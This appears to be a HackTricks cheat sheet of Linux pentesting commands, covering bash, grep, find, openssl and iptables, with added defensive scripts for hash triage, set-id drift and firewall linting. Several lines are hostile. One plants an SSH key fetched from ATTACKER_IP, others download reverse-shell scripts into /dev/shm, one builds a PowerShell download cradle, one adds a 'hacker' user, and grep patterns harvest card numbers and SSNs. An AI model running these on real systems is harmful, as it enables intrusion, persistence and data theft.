Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get access today:
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud GitHub repositories.
Common Bash
```bash
#Exfiltration using Base64
base64 -w0 file

#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'

#Add public key to authorized keys
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

#Echo without new line and Hex
echo -n -e

#Count
wc -l <file> #Lines
wc -c #Chars

#Sort
sort -nr #Sort by number and then reverse
cat file | sort | uniq #Sort and delete duplicates

#Replace in file
sed -i 's/OLD/NEW/g' path/file #Replace string inside a file

#Download in RAM
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py

#Files used by network processes
lsof #Open files belonging to any process
lsof -p 3 #Open files used by the process
lsof -i #Files used by network processes
lsof -i4 #Files used by network IPv4 processes
lsof -i6 #Files used by network IPv6 processes
lsof -i4 -a -p 1234 #List all open IPv4 network files in use by the process 1234
lsof +D /lib #Processes using files inside the indicated dir
lsof -i :80 #Files used by network processes on port 80
fuser -nv tcp 80

#Decompress
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z x file.7z
sudo apt-get install xz-utils; unxz file.xz

#Add new user (the password hash is generated by openssl passwd)
useradd -p "$(openssl passwd -1 '<Password>')" hacker

#Clipboard
xclip -sel c < file.txt

#HTTP servers
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80

#Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint

#Send Email
sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content

#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob

#Mount .vhd files (virtual hard drive)
sudo apt-get install libguestfs-tools
guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create /mnt/vhd first

# ssh-keyscan helps to find out whether 2 ssh ports belong to the same host by comparing keys
ssh-keyscan 10.10.10.101

# Openssl
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
openssl req -new -key newuser.key -out newuser.csr #Generate a certificate request from a private key. Recommended to set the "Organization Name" (Fortune) and the "Common Name" (newuser@fortune.htb)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create the pkcs12 certificate format (firefox) from the signed certificate
# If you only need to create a client certificate from a CA certificate and the CA key, you can do it using:
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
# Decrypt ssh key
openssl rsa -in key.ssh.enc -out key.ssh
#Decrypt
openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz

#Count number of instructions executed by a program, needs a host-based linux (not working in a VM)
perf stat -x, -e instructions:u ls

#Find trick for HTB, find files from 2018-12-12 to 2018-12-14
find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null

#Reconfigure timezone
sudo dpkg-reconfigure tzdata

#Search which package a binary comes from
apt-file search /usr/bin/file #Needed: apt-get install apt-file

#Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html
echo "CIKUmMesGw==" | base64 -d | protoc --decode_raw

#Set the immutable (not removable) bit
sudo chattr +i file.txt
sudo chattr -i file.txt #Remove the bit so you can delete it

# List files inside zip
7z l file.zip
```
```bash
#Base64 for Windows
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0

#Exe compression
upx -9 nc.exe

#Exe2bat
wine exe2bat.exe nc.exe nc.txt

#Compile Windows python exploit to exe
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py

#Compile for windows
#sudo apt-get install gcc-mingw-w64-i686
i686-w64-mingw32-gcc -o executable useradd.c
```
Greps
Grep stands for "Global Regular Expression Print". It is used to search lines of text and filter them by pattern. It is a powerful tool for searching files for specific strings.
```bash
#Extract emails from file
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt

#Extract valid IP addresses
grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt

#Extract passwords
grep -i "pwd\|passw" file.txt

#Extract users
grep -i "user\|invalid\|authentication\|login" file.txt

# Extract hashes
#Extract md5 hashes ({32}); change the count to {40} for sha1, {64} for sha256, {128} for sha512
egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt

#Extract valid MySQL-Old hashes
grep -E -o "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt

#Extract blowfish (bcrypt) hashes: $2a$<cost>$ followed by 53 base64 chars
grep -E -o '\$2a\$[0-9]{2}\$[./0-9A-Za-z]{53}' *.txt > blowfish-hashes.txt

#Extract Joomla hashes
egrep -o '([0-9a-zA-Z]{32}):(\w{16,32})' *.txt > joomla.txt

#Extract VBulletin hashes
egrep -o '([0-9a-zA-Z]{32}):(\S{3,32})' *.txt > vbulletin.txt

#Extract phpBB3-MD5
egrep -o '\$H\$\S{31}' *.txt > phpBB3-md5.txt

#Extract Wordpress-MD5
egrep -o '\$P\$\S{31}' *.txt > wordpress-md5.txt

#Extract Drupal 7
egrep -o '\$S\$\S{52}' *.txt > drupal-7.txt

#Extract old Unix-md5
egrep -o '\$1\$\w{8}\$\S{22}' *.txt > md5-unix-old.txt

#Extract md5-apr1
egrep -o '\$apr1\$\w{8}\$\S{22}' *.txt > md5-apr1.txt

#Extract sha512crypt, SHA512(Unix)
egrep -o '\$6\$\w{8}\$\S{86}' *.txt > sha512crypt.txt

#Extract e-mails from text files
grep -E -o '\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+\b' *.txt > e-mails.txt

#Extract HTTP URLs from text files
grep -shoP 'http.*?[" >]' *.txt > http-urls.txt
#For extracting HTTPS, FTP and other URL formats use
grep -E '(((https|ftp|gopher)|mailto)[.:][^ >" ]*|www.[-a-z0-9.]+)[^ .,; >">):]' *.txt > urls.txt
#Note: if grep returns "Binary file (standard input) matches" use one of the following approaches
# cat *.log | tr '[\000-\011\013-\037\177-\377]' '.' | grep -E "Your_Regex"
# cat -v *.log | egrep -o "Your_Regex"

#Extract Floating point numbers
grep -E -o "^[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt

# Extract credit card data
#Visa
grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt
#MasterCard
grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt
#American Express
grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt
#Diners Club (non-capturing groups need -P)
grep -P -o '\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b' *.txt > diners.txt
#Discover
grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt
#JCB
grep -P -o '\b(?:2131|1800|35\d{3})\d{11}\b' *.txt > jcb.txt
#AMEX
grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt

# Extract IDs
#Extract Social Security Number (SSN)
grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt
#Extract Indiana Driver License Number
grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt
#Extract US Passport Cards
grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt
#Extract US Passport Number
grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt
#Extract US Phone Numbers
grep -P -o '\d{3}[\s_-]?\d{3}[\s_-]?\d{4}' *.txt > us-phones.txt
#Extract ISBN Numbers (lookaheads need -P)
grep -a -o -P '\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b' *.txt > isbn.txt
```
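The hash-extraction greps above each pull out one format. When triaging a leaked credential file a defender usually wants the reverse question answered, "which formats are in here, and how many of each", because that decides how fast the hashes crack and whether the passwords must be rotated immediately. The script below is an added example (not code from the original page) that applies the same length-and-prefix logic as the page's regexes to a constructed sample dump and labels every hit with its format. It uses only `grep -E` so it runs on GNU grep without PCRE support; the sample lines are constructed values, not real credentials.

```bash
# Added example, not from the original page: classify hash-looking tokens in a
# text dump by format (md5/sha1 hex digests, md5crypt, sha512crypt, bcrypt,
# phpass). Sample input below is constructed for the demo.

# Write a constructed sample dump to the path given as $1.
write_sample_dump() {
    cat > "$1" <<'EOF'
admin:5f4dcc3b5aa765d61d8327deb882cf99
bob:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
md5crypt:$1$abcdefgh$nAYJFzHkQjMCcTf6oKw0f/
sha512crypt:$6$abcdefgh$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789./abcdefghijklmnopqrstuv
bcrypt:$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy
phpass:$P$BOMFGD1LFa9x1.8aUuR/qEw.i/dr0s/
EOF
}

# Print "<format> <hash>" for each recognised hash in the file $1.
classify_hashes() {
    f=$1
    # Unsalted hex digests: the length alone identifies the algorithm. The
    # [^hex] guard on both sides stops a 32-char run inside a 40-char sha1
    # from being reported as md5.
    grep -E -o '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' "$f" | grep -E -o '[a-fA-F0-9]{32}' | sed 's/^/md5 /'
    grep -E -o '(^|[^a-fA-F0-9])[a-fA-F0-9]{40}([^a-fA-F0-9]|$)' "$f" | grep -E -o '[a-fA-F0-9]{40}' | sed 's/^/sha1 /'
    # Modular-crypt formats: the $id$ prefix names the algorithm and the tail
    # is a fixed-length base64 (./0-9A-Za-z) digest. \$ is a literal dollar in
    # ERE, and single quotes keep the shell from expanding it.
    grep -E -o '\$1\$[^$]{1,8}\$[./0-9A-Za-z]{22}' "$f" | sed 's/^/md5crypt /'
    grep -E -o '\$6\$[^$]{1,16}\$[./0-9A-Za-z]{86}' "$f" | sed 's/^/sha512crypt /'
    grep -E -o '\$2[aby]\$[0-9]{2}\$[./0-9A-Za-z]{53}' "$f" | sed 's/^/bcrypt /'
    grep -E -o '\$[PH]\$[./0-9A-Za-z]{31}' "$f" | sed 's/^/phpass /'
    return 0
}

# Count how many hashes of format $1 (e.g. bcrypt) appear in file $2.
count_format() {
    classify_hashes "$2" | grep -c "^$1 "
}

# Stand-alone run: write_sample_dump /tmp/dump.txt; classify_hashes /tmp/dump.txt
```

The unsalted md5/sha1 entries are the ones to worry about first: they are cheap to crack offline, whereas the bcrypt and sha512crypt lines have a work factor built in.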
Find
Find files owned by a specific user
To find all files owned by a specific user, use the following command:
```bash
find / -user username
```
Replace username with the username of the user you want to search for.
Find files larger than a specific size
To find files that are larger than a specific size, you can use the following command:
```bash
find / -size +100M
```
This command will find files larger than 100 megabytes. You can adjust the size as needed.
Find files modified in the last N days
To find files that have been modified in the last N days, you can use the following command:
```bash
find / -mtime -N
```
Replace N with the number of days. This command will find files modified in the last N days.
```bash
# Find SUID set files.
find / -perm /u=s -ls 2>/dev/null

# Find SGID set files.
find / -perm /g=s -ls 2>/dev/null

# Find readable directories and sort by time. (depth = 4)
find / -maxdepth 4 -type d -readable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r

# Find writable directories and sort by time. (depth = 10)
find / -maxdepth 10 -type d -writable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r

# Or find files owned by the current user and sort by time. (depth = 10)
find / -maxdepth 10 -user $(id -u) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r

# Or find files owned by the current group ID and sort by time. (depth = 10)
find / -maxdepth 10 -group $(id -g) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r

# Find newer files and directories and sort by time. (depth = 5)
find / -maxdepth 5 -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less

# Find newer files only and sort by time. (depth = 5)
find / -maxdepth 5 -type f -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less

# Find newer directories only and sort by time. (depth = 5)
find / -maxdepth 5 -type d -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
```
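The SUID/SGID searches above are a one-shot listing. On a host you defend, the useful form is a baseline plus a diff: a set-id binary that was not there yesterday is a classic privilege-escalation or persistence trace. The script below is an added example (not code from the original page) that records the set-id files under a tree and reports newcomers; it uses only portable `find` tests (`-perm -4000` / `-perm -2000`) rather than GNU `-printf`, and the scratch directory, file names and baseline path are assumptions for the demo. Setting the set-id bit on a file you own needs no root, so the demo runs as an ordinary user.

```bash
# Added example, not from the original page: baseline and diff of set-uid /
# set-gid files. Directory and file names in the demo are assumptions.

# List set-uid or set-gid regular files under $1, sorted (comm needs sorted input).
list_setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Record the current set-id files under $1 into the baseline file $2.
save_setid_baseline() {
    list_setid_files "$1" > "$2"
}

# Print set-id files under $1 that are missing from baseline $2.
# Returns 0 when nothing changed, 1 when new set-id files were found.
check_setid_drift() {
    new=$(list_setid_files "$1" | comm -13 "$2" -)
    [ -z "$new" ] && return 0
    printf '%s\n' "$new"
    return 1
}

# Self-contained demo on a scratch directory: one file is SUID when the
# baseline is taken, a second gets SGID afterwards. Prints the number of
# drifted paths (expected: 1).
demo_setid_audit() {
    d=$(mktemp -d)
    touch "$d/ping" "$d/dropper"
    chmod 4755 "$d/ping"            # already set-uid at baseline time
    save_setid_baseline "$d" "$d/baseline.txt"
    chmod 2755 "$d/dropper"         # set-gid bit appears after the baseline
    check_setid_drift "$d" "$d/baseline.txt" | grep -c .
    rm -rf "$d"
}
```

For a real host, run `save_setid_baseline / /var/lib/setid-baseline.txt` once from a known-good state and schedule `check_setid_drift` from cron; the non-zero exit status is what the scheduler alerts on.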
Nmap search help
```bash
#Nmap scripts ((default or version) and smb)
nmap --script-help "(default or version) and *smb*"
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb
nmap --script-help "(default or version) and smb"
```
Bash
Bash is the default shell on most Linux systems. It offers many useful commands and features for interacting with the operating system.
```bash
#All bytes inside a file (except 0x20 and 0x00); note the space after $( so bash does not parse $(( as arithmetic
for j in $( (for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
```
Iptables
Iptables is a powerful firewall tool for Linux systems. It is used to monitor, filter and control the traffic flowing into and out of the system. With iptables, rules can be created to block or allow network traffic based on criteria such as IP address, port and protocol. It is an essential tool for hardening Linux systems.
```bash
#Delete current rules and chains
iptables --flush
iptables --delete-chain

#allow loopback
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

#drop ICMP
iptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP
iptables -A OUTPUT -p icmp -j DROP

#allow established connections
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

#allow ssh, http, https, dns
iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT
iptables -A INPUT -p udp -m udp --sport 53 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT
iptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT

#default policies (set last, after the ACCEPT rules, so you do not lock yourself out)
iptables -P INPUT DROP
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
```
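The ruleset above accepts inbound packets purely because their source port is 53. A remote host picks its own source port, so those two lines let any TCP or UDP traffic through the DROP policy; the replies to this host's own DNS queries are already matched by the RELATED,ESTABLISHED rule, which makes the `--sport` rules both unnecessary and dangerous. The script below is an added example (not code from the original page) that lints an iptables script for exactly that pattern and shows the page's ruleset next to a hardened variant. Both rule lists are embedded as constructed text, so nothing is applied to the running firewall.

```bash
# Added example, not from the original page: lint iptables rule scripts for
# INPUT ACCEPT rules that match only on a source port. Rule texts are
# constructed for the demo and are never passed to iptables.

# The INPUT-relevant part of the ruleset from this page, including the weak
# --sport 53 lines.
page_ruleset() {
    cat <<'EOF'
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT
iptables -A INPUT -p udp -m udp --sport 53 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT
iptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT
iptables -P INPUT DROP
EOF
}

# Hardened variant: DNS answers come back through the ESTABLISHED rule, so the
# source-port rules are simply removed.
hardened_ruleset() {
    page_ruleset | grep -v -- '--sport'
}

# Read an iptables script on stdin and print every INPUT ACCEPT rule that
# matches on --sport without a conntrack state qualifier.
lint_sport_accepts() {
    grep -E -- '-A INPUT .*--sport [0-9]+.* -j ACCEPT' \
        | grep -v -E -- '--state +(RELATED|ESTABLISHED)'
    return 0
}

# Count the findings for the ruleset-producing function named in $1.
count_findings() {
    "$1" | lint_sport_accepts | grep -c .
}

# Stand-alone run: count_findings page_ruleset; count_findings hardened_ruleset
```

The same check applies to any saved `iptables-save` output: pipe the file into `lint_sport_accepts` and treat a non-empty result as a finding.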